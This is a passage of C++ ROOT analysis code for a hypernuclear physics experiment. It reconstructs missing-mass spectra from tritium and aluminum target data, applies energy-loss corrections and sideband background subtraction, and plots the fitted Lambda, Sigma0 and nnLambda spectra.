      hb_al1-> Fill(mm_ht); // c/0.25
      hbal_20_1-> Fill(mm_ht); // c/0.2
    }
  ///// Real spectrum
  if(htflag1 == true && HTallflag == true/* && (mm_ht> -5.0 && mm_ht <-1.0) ||(mm_ht> 19.5 && mm_ht <32.4))*/){ //plot spectrum
    h21->Fill(mm_ht);
    hh->Fill(mm_ht);
    hal_15_1->Fill(mm_ht); // NOV 30, 2020// counts /0.15 MeV
    he->Fill(mm_ht);
    h_al1->Fill(mm_ht); // NOV 16, 2020// counts /0.25 MeV
    hal_20_1->Fill(mm_ht); // NOV 30, 2020// counts /0.2 MeV
    // De-normalize the *_4 copies before storing in the Al tune buffers.
    XFP_4 = XFP_4 * XFPr + XFPm;
    XpFP_4 = XpFP_4 * XpFPr + XpFPm;
    YFP_4 = YFP_4 * YFPr + YFPm;
    YpFP_4 = YpFP_4 * YpFPr + YpFPm;
    R_XFP_4 = R_XFP_4*XFPr +XFPm ;
    R_XpFP_4 = R_XpFP_4*XpFPr+XpFPm;
    R_YFP_4 = R_YFP_4*YFPr+ YFPm;
    R_YpFP_4 = R_YpFP_4*YpFPr +YpFPm;
    tnew->Fill();
    bool lambdaflag_4=false;
    int peak_with_hit_4= -1;
    for(int j=0; j<npeak_4; j++){
      if(Lambda_cent_4[j]-Lambda_width_4[j]<mm_ht
         &&mm_ht < Lambda_cent_4[j]+Lambda_width_4[j]){
        lambdaflag_4=true;
        peak_with_hit_4=j;
      }
      else lambdaflag_4=false;
      if(ntune_event_4<nmax_4 && lambdaflag_4==true){
        foil_flag_4[ntune_event_4] = peak_with_hit_4;
        p10_4[ntune_event_4] = par_ep_2[0]; // right side should be _2 // for Al data
        p11_4[ntune_event_4] = par_ep_2[1];
        p12_4[ntune_event_4] = par_ep_2[2];
        p13_4[ntune_event_4] = par_k_2[0];
        p14_4[ntune_event_4] = par_k_2[1];
        p15_4[ntune_event_4] = par_k_2[2];
        p16_4[ntune_event_4] = hallap_2;
        x_4[ntune_event_4] = R_XFP_4; ////RHRS open these lines only when RHRS mom matrix is tuning
        y_4[ntune_event_4] = R_YFP_4;
        xp_4[ntune_event_4] = R_XpFP_4;
        yp_4[ntune_event_4] = R_YpFP_4;
        // x_4[ntune_event_4] = XFP_4; ////LHRS open these lines only when LHRS mom matrix is tuning
        // y_4[ntune_event_4] = YFP_4;
        // xp_4[ntune_event_4] = XpFP_4;
        // yp_4[ntune_event_4] = YpFP_4;
        z_recon_4[ntune_event_4] = z_av_1_2[0];
        phir_4[ntune_event_4] =ph1_2[0];
        phil_4[ntune_event_4] =ph2_2[0];
        ntune_event_4++;
      }
    }
  }// j=0; j< npeak_4
}
tnew->Write();
// ))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
// ---------------------------------------------------------------------------
// t3 event loop: tritium-target (T/T) data, plus the Al cell-window events
// from the same tree. Two parallel reconstruction paths per event:
//   *_tt_* variables: tritium path -> nnLambda (mm_t) and H-contamination
//                     (mm_h) spectra,
//   plain *_3 path:   Al-window path -> 27Al missing mass (mm_Al1).
// hallap_3 is corrected in place mid-loop, so statement order matters;
// the code is left byte-identical and only annotated.
// ---------------------------------------------------------------------------
bool rtrig_3 = false;   // RHRS trigger flag for the t3 loop
for(int i=0; i<nmax_3; i++){
  x_3[i] = -2222.0;
  y_3[i] = -2222.0;
  xp_3[i] = -2222.0;
  yp_3[i] = -2222.0;
  z_av_3[i] = -2222.0;
  z_av_1_3[i] = -2222.0;
  phir_3[i] = -2222.0;
  phil_3[i] = -2222.0;
  z_recon_3[i] = -2222.0; //// Jan 04, 2019
  foil_flag_3[i] = -1;
}
// ///////////////////////////////////////////////////////////////////////////////////
for (int i=0 ; i< ent_3 ; i++){
  // Reset per-event scratch arrays to the "unfilled" sentinel.
  for(int j=0 ; j<max ; j++){
    l_x_fp_3[j] = -2222.0;
    l_th_fp_3[j] = -2222.0;
    l_y_fp_3[j] = -2222.0;
    l_ph_fp_3[j] = -2222.0;
    th1_3[j] = -2222.0;
    th2_3[j] = -2222.0;
    ph1_3[j] =-2222.0;
    ph2_3[j] =-2222.0;
    delta_pep_3[j]= -2222.0;
    pep_real_3[j] =-2222.0;
    delta_pk_3[j]= -2222.0;
    pk_real_3[j] = -2222.0;
    delta_tt_pep_3[j]= -2222.0; // May 01, 2021
    pep_tt_real_3[j] =-2222.0;
    delta_tt_pk_3[j]= -2222.0;
    pk_tt_real_3[j] = -2222.0;
    r_x_fp_3[j] = -2222.0;
    r_th_fp_3[j] = -2222.0;
    r_y_fp_3[j] = -2222.0;
    r_ph_fp_3[j] = -2222.0;
    trig5_3[j] = 0.0;
    rtrig_3 = false;
  }
  trig5_3[0] = 0.0;
  rtrig_3 = false;
  t3->GetEntry(i);
  // trig5 > 1 marks an RHRS trigger for this event.
  if(trig5_3[0]>1.0) rtrig_3 = true; //JUly 01, 2019
  else rtrig_3 = false;
  // Average vertex z, duplicated for the two reconstruction paths.
  z_av_3[0] = (lvz_3[0] + rvz_3[0])/2.0;
  z_av_1_3[0] = z_av_3[0];
  z_av_tt_3[0] = z_av_3[0];
  XFP_3 = l_x_fp_3[0];
  XpFP_3 = l_th_fp_3[0];
  YFP_3 = l_y_fp_3[0];
  YpFP_3 = l_ph_fp_3[0];
  R_XFP_3 = r_x_fp_3[0];
  R_XpFP_3 = r_th_fp_3[0];
  R_YFP_3 = r_y_fp_3[0];
  R_YpFP_3 = r_ph_fp_3[0];
  // Normalize focal-plane variables into the matrix parameterization range.
  XFP_3 = (XFP_3-XFPm)/XFPr;
  XpFP_3 = (XpFP_3-XpFPm)/XpFPr;
  YFP_3 = (YFP_3-YFPm)/YFPr;
  YpFP_3 = (YpFP_3-YpFPm)/YpFPr;
  R_XFP_3 = (R_XFP_3-XFPm)/XFPr;
  R_XpFP_3 = (R_XpFP_3-XpFPm)/XpFPr;
  R_YFP_3 = (R_YFP_3-YFPm)/YFPr;
  R_YpFP_3 = (R_YpFP_3-YpFPm)/YpFPr;
  z_av_3[0] =(z_av_3[0]- Ztm)/Ztr;
  // LHRS target-angle and momentum reconstruction.
  th2_3[0] = calcf2t_th(Theta_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_1_3[0]);
  th2_3[0] = th2_3[0]*Xptr + Xptm;
  ph2_3[0] = calcf2t_ph(PHI_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_1_3[0] );
  ph2_3[0] = ph2_3[0]*Yptr + Yptm;
  momL_3[0] = calcf2t_mom(mom_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_3[0]);
  momL_3[0] =momL_3[0]*Momr + Momm;
  // Central-momentum rescaling for the T kinematics setting.
  momL_3[0] = momL_3[0]*2.217925/2.10; // Original for H/T and tritium only
  par_ep_3[1] = -th2_3[0]; // Dec4, 2019
  par_ep_3[2] = -ph2_3[0];
  /// May 01, 2021, ************************* from here "seperate target struggling for NNL" ***********========================
  /// making the different variable to store the variable to calculate the NNL spectrum.====LHRS =========================
  par_tt_ep_3[1] = -th2_3[0]; // May 01, 2021
  par_tt_ep_3[2] = -ph2_3[0];
  double holiang5_tt;
  // Target struggling LHRS step #7...... MAy 01, 2021
  if( z_av_tt_3[0]<8.0e-2){
    holiang5_tt = par_tt_ep_3[2] + hrs_ang;
    holiang5_tt = - holiang5_tt;
    delta_tt_pep_3[0] = -1.35758*sin(-4.59571* holiang5_tt) + 2.09093;
  }
  else{
    holiang5_tt = par_tt_ep_3[2] + hrs_ang;
    holiang5_tt = - holiang5_tt;
    delta_tt_pep_3[0] = 6.23409e-3* holiang5_tt + 4.03363e-1;
  }
  pep_tt_real_3[0] = momL_3[0] + delta_tt_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
  par_tt_ep_3[0] = pep_tt_real_3[0] ;
  /// May 01, 2021, ************************* upto here "seperate target struggling for NNL" ***********======================
  ///// The following are the target energy struggling for the Al (T/T) target====LHRS =======================
  double holiang5;
  if( z_av_1_3[0]<8.0e-2){
    holiang5 = par_ep_3[2] + hrs_ang;
    holiang5 = - holiang5;
    delta_pep_3[0] = -1.35758*sin(-4.59571* holiang5) + 2.09093;
    delta_pep_3[0] = delta_pep_3[0] + 0.0524; //May 03, 2021********************************************
  }
  else{
    holiang5 = par_ep_3[2] + hrs_ang;
    holiang5 = - holiang5;
    // delta_pep_3[0] = 6.23409e-3* holiang5 + 4.03363e-1;
    delta_pep_3[0] = 0.3027; //May 07, 2021********************************************
  }
  pep_real_3[0] = momL_3[0] + delta_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
  par_ep_3[0] = pep_real_3[0] ;
  ///// up to here is the target energy struggling for the Al target===LHRS =========================
  // RHRS angle and momentum calculation
  th1_3[0] = calcf2t_th(Theta_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
  th1_3[0] = th1_3[0]*Xptr + Xptm;
  ph1_3[0] = calcf2t_ph(PHI_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
  ph1_3[0] = ph1_3[0]*Yptr + Yptm;
  momR_3[0] = calcf2t_mom(mom_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
  momR_3[0] = momR_3[0]*Momr+Momm;
  par_k_3[1] = -th1_3[0]; // Dec2, 2019
  par_k_3[2] = -ph1_3[0];
  /// May 01, 2021, ************************* from here "seperate target struggling for NNL" ***********=====================
  /// making the different variable to store the variable to calculate the NNL spectrum.==RHRS ================================
  par_tt_k_3[1] = -th1_3[0]; // May 01, 2021
  par_tt_k_3[2] = -ph1_3[0];
  double holiang6_tt;
  // target struggling step #11
  if(z_av_tt_3[0]<8.0e-2){
    holiang6_tt = par_tt_k_3[2] - hrs_ang;
    holiang6_tt = holiang6_tt;   // no-op self-assignment (kept for symmetry with the LHRS sign flip)
    delta_tt_pk_3[0] =-1.31749*sin(-4.61513*holiang6_tt) + 2.03687;
  }
  else{
    holiang6_tt = par_tt_k_3[2] - hrs_ang;
    holiang6_tt = holiang6_tt;   // no-op self-assignment
    delta_tt_pk_3[0] = 3.158e-2*holiang6_tt + 4.05819e-1;
  }
  pk_tt_real_3[0] = momR_3[0] + delta_tt_pk_3[0]/1000.0; // kaon momentum at the reaction point
  par_tt_k_3[0] = pk_tt_real_3[0];
  /// May 01, 2021, ************************* upto here "seperate target struggling for NNL" ***********===============
  //// Now MM calculation for the Lnn spectrum===========================================================
  hallap_tt_3 = hallap_3-0.1843 ;// must be -ve
  hallap_tt_3 = hallap_tt_3/1000.0; // MeV-->GeV
  mm_h = CalcMM(hallap_tt_3, par_tt_ep_3, par_tt_k_3, mp); //// to see hydrogen in tritium data
  mm_h = (mm_h)*1000.;
  mm_h = mm_h -1115.683;   // subtract M(Lambda) -> -B_Lambda scale for H contamination
  mm_3 = CalcMM(hallap_tt_3, par_tt_ep_3, par_tt_k_3, m_T);
  mm_3 = (mm_3)*1000.; // GeV--->MeV
  mm_t = mm_3 -2994.814; // for tritium target only By TOSHI when consider the tritium mass (recoil mass)
  //// up to here is MM calculation for the Lnn spectrum===========================================================
  //// The following is target eenrgy struggling and 27_Mg_L calculation===RHRS===Al target(T/T)=========
  double holiang6;
  // target struggling step #11
  if(z_av_1_3[0]<8.0e-2){
    holiang6 = par_k_3[2] - hrs_ang;
    holiang6 = holiang6;   // no-op self-assignment
    delta_pk_3[0] =-1.31749*sin(-4.61513*holiang6) + 2.03687;
    delta_pk_3[0] = delta_pk_3[0] + 0.0512;//May 07, 2021********************************************
  }
  else{
    holiang6 = par_k_3[2] - hrs_ang;
    holiang6 = holiang6;   // no-op self-assignment
    // delta_pk_3[0] = 3.158e-2*holiang6 + 4.05819e-1;
    delta_pk_3[0] = 0.2993;//May 07, 2021********************************************
  }
  pk_real_3[0] = momR_3[0] + delta_pk_3[0]/1000.0; // kaon momentum at the reaction point
  par_k_3[0] = pk_real_3[0];
  // missing mass calculation====Al data ==========================
  // NOTE: hallap_3 is corrected IN PLACE here (after hallap_tt_3 was derived
  // from it above) — the ordering of these statements is load-bearing.
  // hallap_3 = hallap_3-0.1843 ;// must be -ve
  if(z_av_1_3[0]<8.0e-2){
    hallap_3 = hallap_3 - 0.1065;//May 07, 2021********************************************
  }
  else{
    hallap_3 = hallap_3 - 0.2318;//May 07, 2021********************************************
  }
  hallap_3 = hallap_3/1000.0; // MeV-->GeV
  mm_Al = CalcMM(hallap_3, par_ep_3, par_k_3, m_Al);
  mm_Al = (mm_Al)*1000.0;
  mm_Al1 = mm_Al -25.3123*1000; // for Al Al kinematics only. when consider Al as target
  /////+++++++++++++++++++++++++++++++++++===========================- aerogel hist for thesis sept 04, 2020++++++++++++++++
  //// ========================= from here is tritium data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
  // Tritium-gas selection: RHRS trigger, arm-vertex agreement, aerogel PID
  // (a1/a2) cuts, vertex inside +/-10 cm of target center.
  bool Tritium_flag = false;
  if(rtrig_3==true && fabs(lvz_3[0]-rvz_3[0])< 0.053 &&
     a1_3<180.0 && a2_3>1550.0 && a2_3<8000.0 && fabs(z_av_1_3[0])<0.10){//chnged Jan 11 2020
    Tritium_flag = true;
  }
  else Tritium_flag = false;
  //// for nnl real analysis
  if(Tritium_flag == true && fabs(ctime_3)<1.0){ //to plot real nnL spectrum
    h50->Fill(mm_t); // For nnL spectrum
    h25_2->Fill(mm_t);
    // H contamination +++++++++++++++++++++++++++++
    h_h->Fill(mm_h); // H Contamination with 1.5 MeV/bin
    h_hc0->Fill(mm_h);
    h_hc1->Fill(mm_h);
    h1_2->Fill(mm_t); // nnL spectrum
    ///&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%%%%%%%%$$$$$$$$# DEC 01, 2020%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    // Same quantity filled into many binning/range variants for the thesis plots.
    h150_1->Fill(mm_t);
    h150_2->Fill(mm_t);
    h150_3->Fill(mm_t);
    h150_4->Fill(mm_t);
    h150_5->Fill(mm_t);
    h150_6->Fill(mm_t);
    h125_1->Fill(mm_t);
    h125_2->Fill(mm_t);
    h125_3->Fill(mm_t);
    h125_4->Fill(mm_t);
    h125_5->Fill(mm_t);
    h125_6->Fill(mm_t);
    h1_qu->Fill(mm_t);
    h1_q1->Fill(mm_t);
    h1_0->Fill(mm_t);
    h1_01->Fill(mm_t);
    h1_02->Fill(mm_t);
    h1_03->Fill(mm_t);
    h1_04->Fill(mm_t);
    h1_05->Fill(mm_t);
    h1_may->Fill(mm_t);
  }
  //// for nnl backkground analysis
  // Accidental background: coincidence-time sidebands.
  bool bg_nnlflag = false;
  if((ctime_3>-49.39 && ctime_3 < -9.06)||(ctime_3> 13.18 && ctime_3 < 48.6)){//chnged Jan 11 2020
    bg_nnlflag = true;
  }
  else bg_nnlflag = false;
  if(Tritium_flag == true && bg_nnlflag ==true){
    h25_2b->Fill(mm_t);
    h50b->Fill(mm_t);
    // background for H contamination ++++++++++++++++++++++++
    h1_2b->Fill(mm_t);
    h_hbg->Fill(mm_h); // bg in H contamination
    h_hc0b->Fill(mm_h);
    h_hc1b->Fill(mm_h);
    h1_01b->Fill(mm_t);
    h1_03b->Fill(mm_t);
    h1_05b->Fill(mm_t);
    h125_6b->Fill(mm_t);
    h125_4b->Fill(mm_t);
    h125_5b->Fill(mm_t);
    h125_3b->Fill(mm_t);
    h1b_may->Fill(mm_t);
    h150_1b->Fill(mm_t);
    h150_2b->Fill(mm_t);
    h1_qub->Fill(mm_t);
    h1_qb1->Fill(mm_t);
    h1_02b->Fill(mm_t);
  }
  ////// ========================= upt o here is tritium data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
  // //// ========================= from here is Al data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
  ////// for tune a1 nd a2 = 120 1650, 6800& 0.04 and to see the spectrum a1 , a2 = 160, 1585, 8000 & 0.5
  // Al entrance/exit cap selection: tighter PID cuts and vertex z inside
  // either window band (|z| in [0.11, 0.14] m).
  bool TTallflag = false;
  if(rtrig_3==true && fabs(lvz_3[0]-rvz_3[0])<0.040 && a1_3<120.0
     && a2_3>1650.0 && a2_3<6800.0 &&
     ((z_av_1_3[0]>-0.14 && z_av_1_3[0]<-0.11) || (z_av_1_3[0]>0.11 && z_av_1_3[0]<0.14))){//for entrance and exit aluminum caps
    TTallflag = true;
  }
  else TTallflag = false;
  ///// for Al background analysis ======================================================================
  bool bg1_flag = false;
  if((ctime_3> -49.39 && ctime_3 < -9.06) ||(ctime_3> 13.18 && ctime_3 < 48.6)){
    bg1_flag = true;
  }
  else bg1_flag = false;
  if(TTallflag == true && bg1_flag == true)
    {
      hb1->Fill(mm_Al1);
      hb6->Fill(mm_Al1);
      h21_b->Fill(mm_Al1);
      hb_al2->Fill(mm_Al1); // count/0.25
      hbal_20_2->Fill(mm_Al1);// count/0.2
      hbal_15_2->Fill(mm_Al1);// count/0.15
    }
  /// real spectrum AL
  if(TTallflag == true && fabs(ctime_3) < 1.0 /*&&((mm_Al1 > -5.3 &&mm_Al1<-1.1)||(mm_Al1 >19.5 &&mm_Al1<32.4))*/){//plot Al spectrum
    h20->Fill(mm_Al1);
    ht->Fill(mm_Al1);
    hal_15_2->Fill(mm_Al1); // NOV 30 2020 counts/0.15 MeV
    hd->Fill(mm_Al1);
    h_al2->Fill(mm_Al1); // NOV 16 2020 counts/0.25 MeV
    hal_20_2->Fill(mm_Al1); // NOV 30 2020 counts/0.2 MeV
    // De-normalize focal-plane variables before storing in the tune buffers.
    XFP_3 = XFP_3 * XFPr + XFPm;
    XpFP_3 = XpFP_3 * XpFPr + XpFPm;
    YFP_3 = YFP_3 * YFPr + YFPm;
    YpFP_3 = YpFP_3 * YpFPr + YpFPm;
    R_XFP_3 = R_XFP_3*XFPr +XFPm ;
    R_XpFP_3 = R_XpFP_3*XpFPr+XpFPm;
    R_YFP_3 = R_YFP_3*YFPr+ YFPm;
    R_YpFP_3 = R_YpFP_3*YpFPr +YpFPm;
    z_av_3[0] =z_av_3[0]*Ztr + Ztm;
    tnew->Fill();
    bool lambdaflag_3=false; // need adjustment for tune Jan_02
    int peak_with_hit_3= -1;
    for(int j=0; j<npeak_3; j++){
      if(Lambda_cent_3[j]-Lambda_width_3[j]<mm_Al1 // mm_3 need to be adjusted for event selection
         &&mm_Al1 < Lambda_cent_3[j]+Lambda_width_3[j]){
        lambdaflag_3=true;
        peak_with_hit_3=j;
      }
      else lambdaflag_3=false;
      if(ntune_event_3<nmax_3 && lambdaflag_3==true){
        foil_flag_3[ntune_event_3] = peak_with_hit_3;
        p10_3[ntune_event_3] = par_ep_3[0];
        p11_3[ntune_event_3] = par_ep_3[1];
        p12_3[ntune_event_3] = par_ep_3[2];
        p13_3[ntune_event_3] = par_k_3[0];
        p14_3[ntune_event_3] = par_k_3[1];
        p15_3[ntune_event_3] = par_k_3[2];
        p16_3[ntune_event_3] = hallap_3;
        x_3[ntune_event_3] = R_XFP_3; ////RHRS open these lines only when RHRS momentum matrix is tuning
        y_3[ntune_event_3] = R_YFP_3;
        xp_3[ntune_event_3] = R_XpFP_3;
        yp_3[ntune_event_3] = R_YpFP_3;
        // x_3[ntune_event_3] = XFP_3; ////LHRS open these lines only when LHRS momentum matrix is tuning
        // y_3[ntune_event_3] = YFP_3;
        // xp_3[ntune_event_3] = XpFP_3;
        // yp_3[ntune_event_3] = YpFP_3;
        z_recon_3[ntune_event_3] = z_av_1_3[0];
        phir_3[ntune_event_3] =ph1_3[0];
        phil_3[ntune_event_3] =ph2_3[0];
        ntune_event_3++;
      }
    }//int j
  }
}
tnew->Write();
// ))))))))))))))))))))))))))))))))))))))))) t3 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
// // HH data
// ---------------------------------------------------------------------------
// Plotting and fitting section. Gaussian fits extract the Lambda / Sigma0
// peak positions and widths from the H/H spectrum; background histograms are
// scaled by 0.82/38.0 (accidental-sideband normalization: the sideband
// window is ~38x wider than the real coincidence window — NOTE(review):
// confirm the 0.82 factor against the analysis note) and overlaid on the
// real spectra. Canvas/draw order is behaviorally significant in ROOT.
// ---------------------------------------------------------------------------
TF1 *f1 = new TF1("f1","gaus",1112.65,1118.74);////1112.74,1118.64 --->With Al and 1112.38,1118.93
TF1 *f2 = new TF1("f2","gaus",1189.95,1195.15);//1189.75,1195.15 --->With Al and with out al 1189.71,1195.42
TCanvas* c2 = new TCanvas("c2","c2",600,600);
c2->cd();
h->Draw();
h->Fit("f1","MR+"); /// these 3 lines are closed on June 09, 2020 to remove the Gaussian fit
h->Fit("f2","MR+"); /// during the paper is already spread to Hall A collaboration
f1->Draw("same");
TLatex l;
l.SetTextSize(0.06);
l.SetTextFont(62);// time bold italic
l.DrawLatex(1126,200,Form("#Lambda"));
l.DrawLatex(1126,179,Form("#color[2]{Mean = %.6g MeV}",f1->GetParameter(1))); // closed on June 09, 2020
l.DrawLatex(1126,158,Form("#color[2]{ #sigma = %.4g MeV}",f1->GetParameter(2))); // while getting parameter from fit
l.DrawLatex(1164,116,Form("#Sigma^{0}"));
l.DrawLatex(1164,100,Form("#color[2]{Mean = %.6g MeV}",f2->GetParameter(1))); // closed on June 09, 2020
l.DrawLatex(1164,79,Form("#color[2]{ #sigma = %.4g MeV}",f2->GetParameter(2))); // while getting parameter from fit
///// H in tritium data H contamination ++++++++++++++++++++++++++++++++++++++++++++++++=
h_hbg->Scale(0.82/38.0);   // sideband -> in-time background normalization
TCanvas *c_h = new TCanvas("c_h","c_h", 600,600);
c_h->cd();
h_h->Draw();
h_hbg->Draw("E2 same");
h_hbg->SetFillStyle(3002);
h_hbg->SetMarkerStyle(28);
h_hbg->SetMarkerColor(kGreen);
h_hc0b->Scale(0.82/38.0);
TCanvas *ch_0 = new TCanvas("ch_0","ch_0", 600,600);
ch_0->cd();
h_hc0->Draw();
h_hc0b->Draw("E2 same");
h_hc0b->SetFillStyle(3002);
h_hc0b->SetMarkerStyle(28);
h_hc0b->SetMarkerColor(kGreen);
h_hc1b->Scale(0.82/38.0);
TCanvas *ch_1 = new TCanvas("ch_1","ch_1", 600,600);
ch_1->cd();
h_hc1->Draw();
h_hc1b->Draw("E2 same");
h_hc1b->SetFillStyle(3002);
h_hc1b->SetMarkerStyle(28);
h_hc1b->SetMarkerColor(kGreen);
////// up to here is tritium data for H kinematics to see the H contamination in the T gas(((((()()()()()()()()()()()()()(()()()(
//// For H data with T kinematics
TF1 *f1_2 = new TF1("f1_2","gaus",1112.52,1118.8);//1112.7,1118.76 june 15, 2021
TCanvas* c2_2 = new TCanvas("c2_2","c2_2",600,600);
c2_2->cd();
h_2->Draw();
h_2->Fit("f1_2","MR+");
TLatex l2;
l2.SetTextSize(0.06);
l2.SetTextFont(62);
l2.DrawLatex(1140,80,Form("#Lambda")); // when use the fitting
l2.DrawLatex(1140,60,Form("#color[2]{#sigma = %.6g}",f1_2->GetParameter(2)));
l2.DrawLatex(1140,70,Form("#color[2]{mean = %.6g}",f1_2->GetParameter(1)));
////0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000------------888888888
// Combined H+T Al-window spectrum with scaled background overlay.
TF1 *ft2 = new TF1("ft2","gaus",-4.5686,-2.1805);
TF1 *f3 = new TF1("f3","gaus",19.4155,22.883);
TF1 *f4 = new TF1("f4","gaus",29.4463,31.8078);
HT_b ->Add(h20_b,h21_b,1.0,1.0);
HT_b->Scale(0.82/38.0);
TCanvas* cT = new TCanvas("cT","cT",600,600);
cT->cd();
HT->Add(h20,h21,1.0,1.0);
HT->Draw();
HT_b->Draw("E2 same"); // background
HT_b->SetFillStyle(3002);
HT_b->SetMarkerStyle(28);
HT_b->SetMarkerColor(kGreen);
////// counts /0.5 =========================================================================================
hb2->Add(hb,hb1,1.0,1.0);
hb2->Scale(0.82/38.0);
TF1 *f10 = new TF1("f10","gaus",-4.6245,-3.0746);
TF1 *f30 = new TF1("f30","gaus",29.183,31.3214);
TCanvas* c11 = new TCanvas("c11","c11",600,600);
c11->cd();
htt->Add(hh,ht,1.0,1.0);
htt->Draw();
hb2->Draw("E2 same"); // background
hb2->SetFillStyle(3002);
hb2->SetMarkerStyle(28);
hb2->SetMarkerColor(kGreen);
// /// counts / 0.25 MeV Al spectrum +++++++++++++++++++++++++
hb_al->Add(hb_al1,hb_al2,1.0,1.0);
hb_al->Scale(0.82/38.0);
TCanvas* c_al = new TCanvas("c_al","c_al",600,600);
c_al->cd();
h_al->Add(h_al1,h_al2,1.0,1.0);
h_al->Draw();
hb_al->Draw("E2 same"); // background
hb_al->SetFillStyle(3002);
hb_al->SetMarkerStyle(28);
hb_al->SetMarkerColor(kGreen);
hbal_20->Add(hbal_20_1,hbal_20_2,1.0,1.0);//NOV 30, 2020
hbal_20->Scale(0.82/38.0);
TCanvas* cal_20 = new TCanvas("cal_20","cal_20",600,600);
cal_20->cd();
hal_20->Add(hal_20_1,hal_20_2,1.0,1.0);
hal_20->Draw();
hbal_20->Draw("E2 same"); // background
hbal_20->SetFillStyle(3002);
hbal_20->SetMarkerStyle(28);
hbal_20->SetMarkerColor(kGreen);
////0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hbal_15->Add(hbal_15_1,hbal_15_2,1.0,1.0); //NOV 30, 2020
hbal_15->Scale(0.82/38.0);
TCanvas* cal_15 = new TCanvas("cal_15","cal_15",600,600);
cal_15->cd();
hal_15->Add(hal_15_1,hal_15_2,1.0,1.0);
hal_15->Draw();
hbal_15->Draw("E2 same"); // background
hbal_15->SetFillStyle(3002);
hbal_15->SetMarkerStyle(28);
hbal_15->SetMarkerColor(kGreen);
TF1 *f6 = new TF1("f6","gaus",-4.93,-2.582);
TF1 *f5 = new TF1("f5","gaus",4.499,6.8395);
TF1 *f7 = new TF1("f7","gaus",19.4075,20.6485);
TF1 *f8 = new TF1("f8","gaus",29.9542,31.1404);
hb7->Add(hb5,hb6,1.0,1.0);
hb7->Scale(0.82/38.0);
TCanvas* cf = new TCanvas("cf","cf",600,600);
cf->cd();
hf->Add(hd,he,1.0,1.0);
hf->Draw();
f5->SetLineWidth(1);
f6->SetLineWidth(1);
f7->SetLineWidth(1);
f8->SetLineWidth(1);
hb7->Draw("E2 same"); // background
hb7->SetFillStyle(3002);
hb7->SetMarkerStyle(28);
hb7->SetMarkerColor(kGreen);
////000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000---------------------8888888
// nnL spectrum with scaled accidental background.
h50b ->Scale(0.82/38.0);
TH1F * h50b1 = (TH1F*)h50b->Clone();
TCanvas* c50 = new TCanvas("c50","c50",600,600);
c50->cd();
h50->Draw();
h50b1->Draw("E2 same");
h50b1->SetFillStyle(3002);
h50b1->SetMarkerStyle(28);
h50b1->SetMarkerColor(kGreen);
h1_qb1 ->Scale(0.82/38.0);
TCanvas* c_q1 = new TCanvas("c_q1","c_q1",600,600);
c_q1->cd();
h1_q1->Draw();
h1_qb1->Draw("E2 same");
h1_qb1->SetFillStyle(3002);
h1_qb1->SetMarkerStyle(28);
h1_qb1->SetMarkerColor(kGreen);
//////// up to here is the quasi frre shape calculation ///////////////////////////////////////////////////////////
h1_2b->Scale(0.82/38.0);
TCanvas *c1_2 = new TCanvas("c1_2","c1_2", 600,600);
c1_2->cd();
h1_2->Draw();
h1_2b->Draw("E2 same");
h1_2b->SetFillStyle(3002);
h1_2b->SetMarkerStyle(28);
h1_2b->SetMarkerColor(kGreen);
//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
h1_01b->Scale(0.82/38.0);
TCanvas *c1_01 = new TCanvas("c1_01","c1_01", 600,600);
c1_01->cd();
h1_01->Draw();
h1_01b->Draw("E2 same");
h1_01b->SetFillStyle(3002);
h1_01b->SetMarkerStyle(28);
h1_01b->SetMarkerColor(kGreen);
h1b_may->Scale(0.82/38.0);
TCanvas *c1_may = new TCanvas("c1_may","c1_may", 600,600);
c1_may->cd();
h1_may->Draw();
h1b_may->Draw("E2 same");
h1b_may->SetFillStyle(3002);
h1b_may->SetMarkerStyle(28);
h1b_may->SetMarkerColor(kGreen);
h1_02b->Scale(0.82/38.0);
TCanvas *c1_02 = new TCanvas("c1_02","c1_02", 600,600);
c1_02->cd();
h1_02->Draw();
h1_02b->Draw("E2 same");
h1_02b->SetFillStyle(3002);
h1_02b->SetMarkerStyle(28);
h1_02b->SetMarkerColor(kGreen);
h1_03b->Scale(0.82/38.0);
TCanvas *c1_03 = new TCanvas("c1_03","c1_03", 600,600);
c1_03->cd();
h1_03->Draw();
h1_03b->Draw("E2 same");
h1_03b->SetFillStyle(3002);
h1_03b->SetMarkerStyle(28);
h1_03b->SetMarkerColor(kGreen);
h125_6b->Scale(0.82/38.0);
TCanvas *c125_6 = new TCanvas("c125_6","c125_6", 600,600);
c125_6->cd();
h125_6->Draw();
h125_6b->Draw("E2 same");
h125_6b->SetFillStyle(3002);
h125_6b->SetMarkerStyle(28);
h125_6b->SetMarkerColor(kGreen);
//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// h25_2b->Scale(0.82/38.0);
// TCanvas *c25_2 = new TCanvas("c25_2","c25_2", 600,600);
// c25_2->cd();
// h25_2->Draw();
// h25_2b->Draw("E2 same");
// h25_2b->SetFillStyle(3002);
// h25_2b->SetMarkerStyle(28);
// h25_2b->SetMarkerColor(kGreen);
